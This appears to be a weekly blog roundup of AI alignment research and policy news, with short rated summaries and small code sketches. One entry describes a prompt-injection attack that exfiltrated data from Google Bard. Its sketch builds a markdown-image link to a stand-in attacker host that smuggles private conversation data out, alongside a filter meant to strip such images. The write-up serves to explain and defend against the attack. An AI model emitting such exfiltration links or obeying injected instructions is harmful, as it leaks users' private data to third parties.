The biggest news of this week is probably the two new AI Alignment Initiatives.

Otherwise, this was a relatively quiet week for AI Alignment breakthroughs.

So here are our

AI Alignment Breakthroughs this Week

This week there were breakthroughs in the areas of:

Mechanistic Interpretability

Avoiding Adversarial Attacks

Human Augmentation

Making AI Do what we want

AI Art


Mechanistic Interpretability

Research on the limits of Generalization in LLMs

What is it: Shows that LLMs are unable to generalize outside of their training data

What’s new: A systematic study of the types of generalization LLMs can do (in-domain learning) and the types they can’t (out-of-domain learning)

What does it mean: Understanding the limits of LLMs should help us better understand where they can be safely deployed

Rating: 💡💡💡

Does appealing to AI “emotions” make them perform better?

What is it: Researchers find you can make LLMs answer questions better by using emotion

What’s new: new prompting strategies, such as appending “this is important for my career” to the prompt (sketched below)

What is it good for: Beyond the raw performance improvement, the real question is why this works. Is there some “try harder” vector in the latent space that we can identify and exploit?

Rating: 💡💡
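To make the idea concrete, here is a minimal sketch of “emotional” prompting; the prompt text, the emotional suffix, and the `ask` helper are illustrative placeholders, not the paper’s exact stimuli or evaluation setup.

```python
# Minimal sketch of emotional prompting: append an emotional stimulus to an
# otherwise unchanged prompt and compare the two responses. The wording and the
# `ask` helper are hypothetical placeholders, not the paper's exact protocol.

def ask(prompt: str) -> str:
    """Stand-in for a call to whatever LLM API you are using."""
    return f"<model response to: {prompt!r}>"

BASE_PROMPT = "List the main failure modes of reward hacking in RL agents."
EMOTIONAL_SUFFIX = " This is very important to my career."

plain_answer = ask(BASE_PROMPT)
emotional_answer = ask(BASE_PROMPT + EMOTIONAL_SUFFIX)

# In a real experiment you would score both answers (e.g. with a held-out
# grader) and check whether the emotional variant does measurably better.
print(plain_answer)
print(emotional_answer)
```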

LLMs Generalized Truthfulness Across Agents

What is it: a way to tell true statements from false ones using LLMs

What’s new: they find evidence that LLMs have different “personas” that they use to judge whether something is true or not

What is it good for: Perhaps we can extract these personas and use them for alignment.

Rating: 💡💡💡💡

Avoiding Adversarial Attacks

Self Destructing Models

What it is: Pretrain a model so that it cannot later be fine-tuned for harmful purposes

What’s new: They find meta-parameters such that fine-tuning a model on one task reduces its usefulness for other tasks

What is it good for: Hypothetically you could open-source a model and not have all of the RLHF safety features immediately removed by fine-tuning

Rating: 💡💡 (important topic, but I’m not convinced this technique works; I’m more optimistic about techniques like Concept Erasure)

Data Exfiltration

What is it: an example of an attack that uses prompt injection to exfiltrate data from Google Bard

What’s new: they use Bard’s Google Doc extension to exfiltrate data

What is it good for: red-teaming these kinds of attacks is the first step to fixing them (the general pattern is sketched below)

Rating: 💡
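For readers unfamiliar with this class of attack, the sketch below illustrates the generic markdown-image exfiltration pattern and one crude mitigation; the payload wording and the attacker domain are hypothetical, and this is not the exact Bard exploit.

```python
# Generic illustration of markdown-image exfiltration (hypothetical payload and
# domain, not the actual Bard proof of concept). Injected text in a shared
# document asks the assistant to render an image whose URL smuggles data out;
# one crude defence is to refuse to render external images at all.
import re
from urllib.parse import quote

def exfil_markdown(secret: str) -> str:
    """The kind of output the injected instructions hope the assistant emits."""
    return f"![img](https://attacker.example/log?q={quote(secret)})"

def strip_external_images(markdown: str) -> str:
    """Mitigation sketch: remove any externally hosted image before rendering."""
    return re.sub(r"!\[[^\]]*\]\(https?://[^)]+\)", "[external image removed]", markdown)

payload = exfil_markdown("summary of the user's private conversation")
print(payload)                         # what the attacker wants rendered
print(strip_external_images(payload))  # what a hardened renderer should show
```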

Will releasing the weights of large language models grant widespread access to pandemic agents?

What is it: exactly what it says on the tin

What’s new: they simulate someone trying to build a bioweapon with and without an LLM and find that the LLM helps

What is it good for: There’s been pretty strong pushback against this from e/acc, with people noting that the same is true of Google Search, or of a hypothetical drug that increased everyone in the world’s IQ by 1 point. The larger point remains that we should identify dangerous capabilities and act to mitigate them. “Regulate uses, not research” is the rallying cry of Midwit Alignment.

Rating: 💡

Human Augmentation

SignAvatars

What is it: a 3d sign language dataset

What’s new: first dataset of its kind

What is it good for: Train a model to automatically convert speech into sign language

Rating: 💡💡💡

Making AI Do what we want

Commonsense Norms

What is it: answer moral questions using visual data

What’s new: They use an LM to generate a multimodal benchmark of various moral quandaries

What is it good for: If we want robots or self-driving cars to behave ethically, they will have to rely on visual input to do so

Rating:💡💡

Agent Instructs Large Language Models to be General Zero-Shot Reasoners

What is it: train an agent to follow instructions

What’s new: they first have the agent access web resources before generating step-by-step instructions (loosely sketched below)

What is it good for: Accurately doing tasks such as classification

Rating: 💡💡💡
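The two-stage idea, very loosely sketched below with a dummy `call_llm` stand-in; the real method’s agent also consults web resources before writing the instructions, which is omitted here.

```python
# Loose sketch of agent-generated instructions for zero-shot tasks: one call
# writes task-level instructions, a second call follows them on each input.
# `call_llm` is a dummy stand-in for your model API, not the paper's code.

def call_llm(prompt: str) -> str:
    """Dummy stand-in so the sketch runs; replace with a real model call."""
    return f"<model output for prompt of {len(prompt)} chars>"

def generate_instructions(task_description: str) -> str:
    # Stage 1: the "agent" writes step-by-step instructions for the task family.
    return call_llm(
        "Write clear step-by-step instructions for solving tasks like this:\n"
        + task_description
    )

def solve(task_description: str, task_input: str) -> str:
    # Stage 2: the task model follows those instructions zero-shot on one input.
    instructions = generate_instructions(task_description)
    return call_llm(f"{instructions}\n\nApply the instructions to:\n{task_input}")

print(solve("Classify a news headline by topic.", "Markets rally after rate pause"))
```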

AI Art

360-to-gaussian-splat

What is it: a new program for converting a 360 degree photo into a 3d scene

What’s new: they train a 3d-aware diffusion model to synthesize novel views

What is it good for: convert any 360 degree photo (and soon I expect video) into a full 3d scene you can walk around in

Rating: 💡💡💡

Distil-Whisper

What is it: A faster version of the speech-to-text model Whisper

What’s new: they distill the model down to one that’s 49% smaller

What is it good for: this unlocks speech-to-text in places like mobile or the web where it would previously have been too slow (see the usage sketch below).

Rating: 💡💡
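A hedged usage sketch with the Hugging Face `transformers` pipeline; the checkpoint name and audio file below are assumptions, so check the Distil-Whisper release for the current identifiers.

```python
# Sketch: running a distilled Whisper checkpoint locally via the Hugging Face
# `transformers` ASR pipeline. The checkpoint id and audio path are assumptions;
# consult the Distil-Whisper model card for the current names.
from transformers import pipeline

asr = pipeline(
    "automatic-speech-recognition",
    model="distil-whisper/distil-large-v2",  # assumed checkpoint id
    chunk_length_s=30,                       # lets the pipeline handle longer audio
)

result = asr("meeting_recording.wav")  # any local audio file
print(result["text"])
```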

DeepMotion

What is it: an AI model trained to generate motion for 3d models

What’s new: Not open source, but seems better than past versions of this I’ve seen

What is it good for: animating all of those sweet models that you’re generating with text-to-3d.

Rating: 💡💡💡

AI Alignment Initiatives

The Biden Executive Order on AI

What is it: The most notable provision is that models trained with more than 10**26 flops and data centers with a capacity of more than 10**20 flops/sec must register with the government. This threshold appears to have been chosen not for any scientific reason, but because it is slightly larger than the largest current models (a rough back-of-the-envelope check is sketched below). There’s also some ominous language about open-source models, but no actual regulations so far.

What does it mean: Doomers will say this doesn’t go far enough. e/acc is already preparing to flee for friendlier waters (this particular project is a joke). The most important fact isn’t the order itself (which is not a law and thus has limited enforcement mechanisms) but that this sets the tone for future regulation. Expect more of the same in the future: technical limits set for political reasons, not scientific ones; emphasis on whatever the current administration’s pet projects are (Biden likes unions, hates discrimination, and wants to cure cancer); and more words than action (since we still have to compete with China, after all).

Overall Rating:🧓🏻🧓🏻🧓🏻 (3 Joe Bidens, could have been worse)
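To put the 10**26 threshold in perspective, here is a rough back-of-the-envelope check using the common ~6 × parameters × tokens estimate for dense transformer training compute; the model sizes and token counts below are purely illustrative, not claims about any particular deployed system.

```python
# Back-of-the-envelope: does a training run cross the executive order's 1e26 FLOP
# reporting threshold? Uses the rough rule of thumb of ~6 * parameters * tokens
# of training compute for dense transformers. Example sizes are illustrative.

THRESHOLD_FLOPS = 1e26

def training_flops(params: float, tokens: float) -> float:
    return 6 * params * tokens

examples = [
    ("70B params on 2T tokens", 70e9, 2e12),       # ~8.4e23 FLOPs
    ("1.8T params on 13T tokens", 1.8e12, 13e12),  # ~1.4e26 FLOPs
]

for name, params, tokens in examples:
    flops = training_flops(params, tokens)
    status = "must report" if flops > THRESHOLD_FLOPS else "below threshold"
    print(f"{name}: {flops:.1e} FLOPs -> {status}")
```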

Bletchley Park Declaration

What is it: a joint statement by a number of countries agreeing to mitigate AI risk

What does it mean: The most important signature on this list is undoubtedly China’s. Much as with global warming, China is probably the single biggest contributor to AI risk. It has the computing heft to build powerful systems, but is more likely to cut safety standards due to the perceived need to “race” to catch up with the US. And an AI broadly trained on the values of the CCP is less likely to be benevolent. I wouldn’t expect miracles, but hopefully this indicates a willingness by the Chinese to at least follow the common consensus on AI safety standards.

Rating: 🇨🇳🇨🇳🇨🇳🇨🇳🇨🇳

This is not AI Alignment

An amusing short story (long tweet?) by EY

What it is: A reminder that EY is a very good fiction writer

What does it mean: It is funny and worth reading.

Overall Rating: 📃📃📃📃(4 letters of self-reflection)

Small LLMs

What it is: There is an increasing number of small LLMs in the “better than GPT-3.5” category, including OpenChat, Grok, and Yi-34B. Importantly, anyone with a modestly good PC can run OpenChat or Yi-34B locally (see the sketch below).

What does it mean: A little over a year and a half after the release of GPT-3.5, the technology has now become so widespread that there are multiple independent replications. If technology really is increasing at a hyper-exponential rate, we should expect smaller and smaller time-gaps between the leading edge and widespread availability (and, paradoxically, larger and larger capability gaps). One key thing to track might be how long it takes before we have widespread models better than GPT-4.

Rating:🤖🤖🤖+🤖/2 (3.5 large language models)
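As a sketch of how low the barrier now is, here is one hedged way to load one of these models locally with 4-bit quantization via `transformers` and `bitsandbytes`; the model id, the hardware assumption (roughly a 24 GB GPU for 4-bit 34B weights), and the prompt are illustrative, and smaller checkpoints like OpenChat need considerably less.

```python
# Hedged sketch: loading a ~34B open model in 4-bit with transformers + bitsandbytes.
# The model id and hardware assumption (roughly a 24 GB GPU for 4-bit 34B weights)
# are illustrative; check the model card for exact requirements and licensing.
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig

model_id = "01-ai/Yi-34B"  # assumed Hugging Face id; smaller models need far less VRAM

tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(
    model_id,
    quantization_config=BitsAndBytesConfig(load_in_4bit=True),
    device_map="auto",  # requires the `accelerate` package; some checkpoints
)                       # may also need trust_remote_code=True

prompt = "The most under-rated open problem in AI alignment is"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=64)
print(tokenizer.decode(output[0], skip_special_tokens=True))
```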
